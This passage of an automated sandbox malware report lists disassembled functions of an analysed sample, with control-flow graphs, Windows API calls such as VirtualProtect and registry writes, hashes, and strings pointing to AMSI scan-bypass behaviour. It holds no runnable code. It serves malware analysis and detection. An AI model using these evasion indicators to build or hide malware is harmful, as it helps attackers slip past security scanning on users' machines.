                                                                                                                            • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                            • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                            • API String ID: 897696978-872072817
                                                                                                                            • Opcode ID: e557639441c446610311af995688a77c9df4cede86129f636780ad68d9dc2512
                                                                                                                            • Instruction ID: ea48897f8cd1869da9db613a82d6fa4219d229abb630351495674bd5782cbe6a
                                                                                                                            • Opcode Fuzzy Hash: e557639441c446610311af995688a77c9df4cede86129f636780ad68d9dc2512
                                                                                                                            • Instruction Fuzzy Hash: 59921934A1025ADFDF20FB64D890ADD73B7BFC9704F1494A5A149AB654DBB0AE81CF80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02981724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12450 2981724-2981736 12451 2981968-298196d 12450->12451 12452 298173c-298174c 12450->12452 12455 2981a80-2981a83 12451->12455 12456 2981973-2981984 12451->12456 12453 298174e-298175b 12452->12453 12454 29817a4-29817ad 12452->12454 12457 298175d-298176a 12453->12457 12458 2981774-2981780 12453->12458 12454->12453 12461 29817af-29817bb 12454->12461 12462 2981a89-2981a8b 12455->12462 12463 2981684-29816ad VirtualAlloc 12455->12463 12459 2981938-2981945 12456->12459 12460 2981986-29819a2 12456->12460 12466 298176c-2981770 12457->12466 12467 2981794-29817a1 12457->12467 12469 29817f0-29817f9 12458->12469 12470 2981782-2981790 12458->12470 12459->12460 12468 2981947-298195b Sleep 12459->12468 12471 29819b0-29819bf 12460->12471 12472 29819a4-29819ac 12460->12472 12461->12453 12473 29817bd-29817c9 12461->12473 12464 29816df-29816e5 12463->12464 12465 29816af-29816dc call 2981644 12463->12465 12465->12464 12468->12460 12475 298195d-2981964 Sleep 12468->12475 12480 29817fb-2981808 12469->12480 12481 298182c-2981836 12469->12481 12477 29819d8-29819e0 12471->12477 12478 29819c1-29819d5 12471->12478 12476 2981a0c-2981a22 12472->12476 12473->12453 12479 29817cb-29817de Sleep 12473->12479 12475->12459 12482 2981a3b-2981a47 12476->12482 12483 2981a24-2981a32 12476->12483 12488 29819fc-29819fe call 29815cc 12477->12488 12489 29819e2-29819fa 12477->12489 12478->12476 12479->12453 12487 29817e4-29817eb Sleep 12479->12487 12480->12481 12490 298180a-298181e Sleep 12480->12490 12484 29818a8-29818b4 12481->12484 12485 2981838-2981863 12481->12485 12494 2981a68 12482->12494 12495 2981a49-2981a5c 12482->12495 12483->12482 12491 2981a34 12483->12491 12496 29818dc-29818eb call 29815cc 12484->12496 12497 29818b6-29818c8 12484->12497 12492 298187c-298188a 12485->12492 12493 2981865-2981873 12485->12493 12487->12454 12498 2981a03-2981a0b 12488->12498 12489->12498 12490->12481 12500 2981820-2981827 Sleep 12490->12500 12491->12482 12502 29818f8 12492->12502 12503 298188c-29818a6 call 2981500 12492->12503 12493->12492 12501 2981875 12493->12501 12504 2981a6d-2981a7f 12494->12504 12495->12504 12505 2981a5e-2981a63 call 2981500 12495->12505 12509 29818fd-2981936 12496->12509 12515 29818ed-29818f7 12496->12515 12506 29818ca 12497->12506 12507 29818cc-29818da 12497->12507 12500->12480 12501->12492 12502->12509 12503->12509 12505->12504 12506->12507 12507->12509
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?,02982000), ref: 029817D0
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,02982000), ref: 029817E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 96d595491d5c556a137e1c1d48fb77f0152f930cb68b86b8ccc750fa72649a0a
                                                                                                                            • Instruction ID: efed7afbd6c55cb84755ded349d33e27a2b572a686cd63a1ae6c51b34194c8e5
                                                                                                                            • Opcode Fuzzy Hash: 96d595491d5c556a137e1c1d48fb77f0152f930cb68b86b8ccc750fa72649a0a
                                                                                                                            • Instruction Fuzzy Hash: 21B122B6A05351CBCB15DF68E880365BBE1EB85324F1C86AED44D8F385D7719893CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B61
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997B67
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID: irtualProtect$kernel32
                                                                                                                            • API String ID: 2099061454-2063912171
                                                                                                                            • Opcode ID: e58f4d2d1f5432e0d5535a3c3aaddc3ba23d3bf1750b84bfd56b92d4dc451103
                                                                                                                            • Instruction ID: e4fc19fbe26b41a2f928cc5677700bc00483091d50b4713b3a58a294fd8a01db
                                                                                                                            • Opcode Fuzzy Hash: e58f4d2d1f5432e0d5535a3c3aaddc3ba23d3bf1750b84bfd56b92d4dc451103
                                                                                                                            • Instruction Fuzzy Hash: B90184B5600348AFEB04FFE8DC41E9EB7EDEB88720F554454F514E7680DA34EA108A24
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02981A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12529 2981a8c-2981a9b 12530 2981b6c-2981b6f 12529->12530 12531 2981aa1-2981aa5 12529->12531 12532 2981c5c-2981c60 12530->12532 12533 2981b75-2981b7f 12530->12533 12534 2981b08-2981b11 12531->12534 12535 2981aa7-2981aae 12531->12535 12536 29816e8-298170b call 2981644 VirtualFree 12532->12536 12537 2981c66-2981c6b 12532->12537 12539 2981b3c-2981b49 12533->12539 12540 2981b81-2981b8d 12533->12540 12534->12535 12538 2981b13-2981b27 Sleep 12534->12538 12541 2981adc-2981ade 12535->12541 12542 2981ab0-2981abb 12535->12542 12558 298170d-2981714 12536->12558 12559 2981716 12536->12559 12538->12535 12546 2981b2d-2981b38 Sleep 12538->12546 12539->12540 12547 2981b4b-2981b5f Sleep 12539->12547 12548 2981b8f-2981b92 12540->12548 12549 2981bc4-2981bd2 12540->12549 12543 2981ae0-2981af1 12541->12543 12544 2981af3 12541->12544 12550 2981abd-2981ac2 12542->12550 12551 2981ac4-2981ad9 12542->12551 12543->12544 12552 2981af6-2981b03 12543->12552 12544->12552 12546->12534 12547->12540 12556 2981b61-2981b68 Sleep 12547->12556 12554 2981b96-2981b9a 12548->12554 12553 2981bd4-2981bd9 call 29814c0 12549->12553 12549->12554 12552->12533 12553->12554 12560 2981bdc-2981be9 12554->12560 12561 2981b9c-2981ba2 12554->12561 12556->12539 12566 2981719-2981723 12558->12566 12559->12566 12560->12561 12565 2981beb-2981bf2 call 29814c0 12560->12565 12562 2981bf4-2981bfe 12561->12562 12563 2981ba4-2981bc2 call 2981500 12561->12563 12569 2981c2c-2981c59 call 2981560 12562->12569 12570 2981c00-2981c28 VirtualFree 12562->12570 12565->12561
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?), ref: 02981B17
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?), ref: 02981B31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: f547f121e57f471bd19e28699c43875414399bb3c0d0c254c96f258620f5ffe5
                                                                                                                            • Instruction ID: 2ae0205a693bb6015a63411f6dc4e758e6195e40d39f5f96178ac2cc7c449e59
                                                                                                                            • Opcode Fuzzy Hash: f547f121e57f471bd19e28699c43875414399bb3c0d0c254c96f258620f5ffe5
                                                                                                                            • Instruction Fuzzy Hash: 6851C071A052408FDB15EF6CD984766BBD8AF85324F1C85AED44CCF286E770D886CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299C8AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299C9EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                            • Opcode ID: a5152eb22be28d2a2eeac7f5f3499d3da88e03b69144143a9a0ff072a7feacf5
                                                                                                                            • Instruction ID: 467471d48cf0c1b711341618e09d6570468b72d539aa4002cb71bda65c2e8d1e
                                                                                                                            • Opcode Fuzzy Hash: a5152eb22be28d2a2eeac7f5f3499d3da88e03b69144143a9a0ff072a7feacf5
                                                                                                                            • Instruction Fuzzy Hash: ED41FB31B112499BEF10FBA8DC41ADEB7FAEFC8714F645426E041B7240DA75AD018F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02995BE8 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D30,?,?,029938BC,00000001), ref: 02995C44
                                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D30,?,?,029938BC,00000001), ref: 02995C72
                                                                                                                              • Part of subcall function 02987D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029938BC,02995CB2,00000000,02995D30,?,?,029938BC), ref: 02987D66
                                                                                                                              • Part of subcall function 02987F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029938BC,02995CCD,00000000,02995D30,?,?,029938BC,00000001), ref: 02987F73
                                                                                                                            • GetLastError.KERNEL32(00000000,02995D30,?,?,029938BC,00000001), ref: 02995CD7
                                                                                                                              • Part of subcall function 0298A734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0298C395,00000000,0298C3EF), ref: 0298A753
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 503785936-0
                                                                                                                            • Opcode ID: d2de2fd91c295bfbcf30b5769d4df5f95b2633a9b367756e5d4b4c8b4554363a
                                                                                                                            • Instruction ID: 81778ee3827784f26aee09c532d443dd158a606fc2c48e756327ddd98cc0d885
                                                                                                                            • Opcode Fuzzy Hash: d2de2fd91c295bfbcf30b5769d4df5f95b2633a9b367756e5d4b4c8b4554363a
                                                                                                                            • Instruction Fuzzy Hash: 75318130A042089FDF01EFB8C881BEEBBF6AF88714F958465E504AB380D7755A05CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299D316 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
                                                                                                                            • RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
                                                                                                                            • RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 779948276-0
                                                                                                                            • Opcode ID: fa12d0fbb7ef6fda11ce7b23452403336953ba3fbba57f61caf3d159932342fc
                                                                                                                            • Instruction ID: fec4b15afe85c295871641739876a4668574b1d43b8ad3977c59ea8a0c152c7b
                                                                                                                            • Opcode Fuzzy Hash: fa12d0fbb7ef6fda11ce7b23452403336953ba3fbba57f61caf3d159932342fc
                                                                                                                            • Instruction Fuzzy Hash: DE111970A14205AFEF10FBA8D88296E77FDEF89714F565460B508DB650D632E9008A50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299D318 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
                                                                                                                            • RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
                                                                                                                            • RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 779948276-0
                                                                                                                            • Opcode ID: 2f1ed3571de10b49a6d0f46039131623bfb49b0efe8e05a3e118e7d795161d5f
                                                                                                                            • Instruction ID: 5bfbaab0812bd106c0d8dda4c97a560706e26f069b8c047b98b1d9dec8ee409d
                                                                                                                            • Opcode Fuzzy Hash: 2f1ed3571de10b49a6d0f46039131623bfb49b0efe8e05a3e118e7d795161d5f
                                                                                                                            • Instruction Fuzzy Hash: B4111970A14205AFDF10FBA8D88296E77FDEF89714F565460B508DB650D632E9008A50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997BE8 Relevance: 4.6, APIs: 3, Instructions: 52libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 02997B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B61
                                                                                                                              • Part of subcall function 02997B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997B67
                                                                                                                              • Part of subcall function 02997B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2543409266-0
                                                                                                                            • Opcode ID: 5032c13f1f8ced744851c6c8239caad011e22ae425c05a46b93d2564ba899086
                                                                                                                            • Instruction ID: d522d13a16d828f4eeb2ad9f3562c38c6b446e122028e8ef05c12f89d319c45b
                                                                                                                            • Opcode Fuzzy Hash: 5032c13f1f8ced744851c6c8239caad011e22ae425c05a46b93d2564ba899086
                                                                                                                            • Instruction Fuzzy Hash: 4A01D6B0604344AFEF00FBA8ED51A6EB7F9EFC4700F542464A519AB780DA34D900CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298E320 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 31aff32c1c66dcba52fa870f4424ca3497933e947d37c908a429f3d59bddaaf6
                                                                                                                            • Instruction ID: 4846936a2a11a3788b3f94ffb60f243fc812ae1c56b15240a4e1146224213169
                                                                                                                            • Opcode Fuzzy Hash: 31aff32c1c66dcba52fa870f4424ca3497933e947d37c908a429f3d59bddaaf6
                                                                                                                            • Instruction Fuzzy Hash: 4AF0F620704110D6CB147B38C8E4ABD2F9E6F82310B1C1837F8C65B252DB34CC06C762
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02984D14 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 02984D1F
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 02984D31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Free$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 986138563-0
                                                                                                                            • Opcode ID: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                                            • Instruction ID: dc9506824ef5629fa2d71d30ebd8bb96d09b9b013559382f2999fb03bbcca42d
                                                                                                                            • Opcode Fuzzy Hash: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                                            • Instruction Fuzzy Hash: C0E012B85052025EEB143F218C40B7B376EAFC1765F5C549DA904DA150DB34C442AE35
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02997098 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 02997396
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeString
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 3341692771-2852464175
                                                                                                                            • Opcode ID: c3f009f88b3be62895cd8fd738d904ffb94c8b3c41cf63d1a7429120618d1a33
                                                                                                                            • Instruction ID: f21c229fb25e98619fca4385828499efe379e179e86f797c6d40adf48ecfeb08
                                                                                                                            • Opcode Fuzzy Hash: c3f009f88b3be62895cd8fd738d904ffb94c8b3c41cf63d1a7429120618d1a33
                                                                                                                            • Instruction Fuzzy Hash: E3B1C0B4A11609DFDB14CF98E880A9DFBF6FF89324F148569E805AB364DB31A845CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298E71C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 0298E73D
                                                                                                                              • Part of subcall function 0298E320: VariantClear.OLEAUT32(?), ref: 0298E32F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCopy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 274517740-0
                                                                                                                            • Opcode ID: 0fc9391c0d7d727fde264833debb0dc8ad54432c1a26168d54c7298a77c03423
                                                                                                                            • Instruction ID: f375cf8ca0fad4129017f53c13cb87bb555086000b6ab63690b564accf9aab21
                                                                                                                            • Opcode Fuzzy Hash: 0fc9391c0d7d727fde264833debb0dc8ad54432c1a26168d54c7298a77c03423
                                                                                                                            • Instruction Fuzzy Hash: 2E11827470461087DB20FB29C8E496627EEAFC5750B1C5866FACA8F255DB31CC41CAA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298E3B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1927566239-0
                                                                                                                            • Opcode ID: 8f411ddbb4794aa240ca5a28d4dfcdc1a1bdbabd5fad1a1837957da3b7c56d53
                                                                                                                            • Instruction ID: d22a7f0f7a56a476aca59443d1eca805fdde72821b2942e5aba622e0fac2ba9a
                                                                                                                            • Opcode Fuzzy Hash: 8f411ddbb4794aa240ca5a28d4dfcdc1a1bdbabd5fad1a1837957da3b7c56d53
                                                                                                                            • Instruction Fuzzy Hash: 19314D75A04208AFEB10EEA8C894AAA77FCEB4C314F480566F94DD7280D334E950CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02996D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,02996D75,?,?,?,00000000), ref: 02996D55
                                                                                                                              • Part of subcall function 02984C24: SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromProgString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4225568880-0
                                                                                                                            • Opcode ID: 4945b4e7057864ec9ed0f8f71c031b64a7badc18ad7b7a8c0b33e86c67615aaa
                                                                                                                            • Instruction ID: feae7b495436daaf4c827afa82cad872815ca62ac4271f5233b3c6391efdc0cc
                                                                                                                            • Opcode Fuzzy Hash: 4945b4e7057864ec9ed0f8f71c031b64a7badc18ad7b7a8c0b33e86c67615aaa
                                                                                                                            • Instruction Fuzzy Hash: B4E09B716046047FEB05FB7ADC51D9977FDDFC9710B620471E800D3641E9756E008965
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
